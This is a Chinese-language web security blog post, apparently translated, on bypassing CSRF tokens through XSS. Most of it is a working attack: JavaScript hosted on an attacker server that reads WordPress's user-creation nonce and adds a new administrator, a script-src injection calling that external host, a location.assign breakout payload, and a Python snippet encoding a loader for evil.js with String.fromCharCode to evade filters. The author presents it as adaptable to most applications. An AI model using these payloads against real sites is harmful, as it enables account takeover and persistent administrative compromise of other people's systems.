导语:本文将讲述如何利用XSS绕过CSRF防御,
在验证目标网站应用的xss漏洞时,我一般不会选择弹框的方式。
我觉得最好的payloads是利用需要认证的功能,比如当管理员登录时就新建一个用户。
其他有用的payloads取决于应用本身,比如在购物应用中购买一个商品或者在拍卖应用中竞价。
这些攻击其实是一种有效的CSRF攻击。
现在很多应用都增加了CSRF token来防止CSRF攻击。
如果应用存在xss攻击,那么这种防护通常可以被绕过。
以下就是利用xss漏洞来绕过CSRF防御在WordPress中添加用户的例子。需要管理员执行才能生效。
//Use this to exploit XSS to compromise the application. // just use the XSS payload of <script src=http://[MY_EVIL_SERVER]/add_admin.js> //Host this file on your server url = "http://[TARGET]/wp-admin/user-new.php"; var login = ""; var pass = ""; var email = ""; function httpGet(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open( "GET", url, false ); // false for synchronous request xmlHttp.send( null ); return xmlHttp.responseText; } var all = httpGet(url); var nonce = all.split("name=\"_wpnonce_create-user\" value=\""); var nonce = nonce[1].slice(0, 10); var http = new XMLHttpRequest(); var params = "action=createuser&_wpnonce_create-user=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=" + login + "&email=" + email + "&first_name=&last_name=&url=&pass1=" + pass + "&pass1-text=" + pass + "&pass2=" + pass + "&pw_weak=on&role=administrator&createuser=Add+New+User"; http.open("POST", url, true); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.send(params);
这段js代码的意思如下:
1.在目标中请求user-new.php页面
2.读取HTML并识别CSRF token“_wpnonce_create-user”
3.解析这个变量并保存为“nonce”
4.发送添加用户的post请求,在_wpnonce_create-user参数中提供刚才提取的nonce的值。
我已经使用这个payload在其他应用上执行过类似的攻击。
只要简单修改一下URL,POST参数和nonce位置,这个payload对大多数应用都行而有效。
还有一个问题我也偶尔遇到,在一个存在漏洞的参数中插入所有js代码。
但我发现经常受到长度,特殊字符和xss filter所限制。
为了把这段payload插入到目标应用中,我一般都会调用一个外部的js文件,调用语法很简单,如下:
<script src="http://www.[DOMAIN]/script.js"></script>
我曾经遇到一个应用,防御做的非常好,几乎过滤了所有的xss payload,但我还是成功的通过一个参数将payload插入到一个事件处理器中。
这个处理器使用location.assign来重定向用户,而且用户提供的参数值是通过URL传递的。要突破location.assign的限制,我们需要一个单引号和一个管道来执行额外的js函数。
请求如下:
GET /function?parameter=value'|alert(1)|'&Print=Yes
结果如下:
1 <body onLoad="window.print() ; location.assign('https://[DOMAIN].com/parameter?value='|alert(1)|'')">
在HTML环境中,这会执行alert payload。
为了绕过xss过滤器和不适用任何单引号和双引号,我选择使用document.write和字符编码的方式来写入script标签。
几行python代码就可以编写一个合适的payload:
>> payload = "<script src='https://www.n00py.io/evil.js'></script>" >>> inject = 'document.write(String.fromCharCode('+",".join([str(ord(n)) for n in payload])+'))' >>> inject 'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))'
如果上述代码中”inject”的值转成了alert(1),那我们的payload就会干以下事情:
1.把charcode数据转换成字符串(<script src=’https://www.n00py.io/evil.js’></script>)
2.执行时把script标签写入到web页面中
3.script标签会加在外部js脚本并执行
4.外部js脚本会绕过成功绕过CSRF防护
通过使用String.fromCharCode函数,任何payload都可以写入到web页面中,不用担心黑名单对特殊字符的限制。保证你的恶意js脚本能通过https传输也很重要。如果你发现一个使用https协议的网站存在xss漏洞,你的payload要能够通过https来避免被屏蔽掉。